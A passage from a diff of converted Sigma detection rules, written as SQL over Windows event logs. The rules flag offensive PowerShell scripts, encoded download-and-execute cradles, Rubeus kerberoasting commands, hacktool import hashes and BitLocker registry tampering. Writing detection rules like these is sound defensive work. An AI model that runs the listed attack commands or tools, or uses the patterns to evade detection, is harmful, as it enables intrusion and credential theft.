ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": "proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate use of one of these tools" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "status": "test", + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", - "status": "test", - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "status": "experimental", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add new potentially suspicious download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", - "status": "experimental", - "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast %' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' 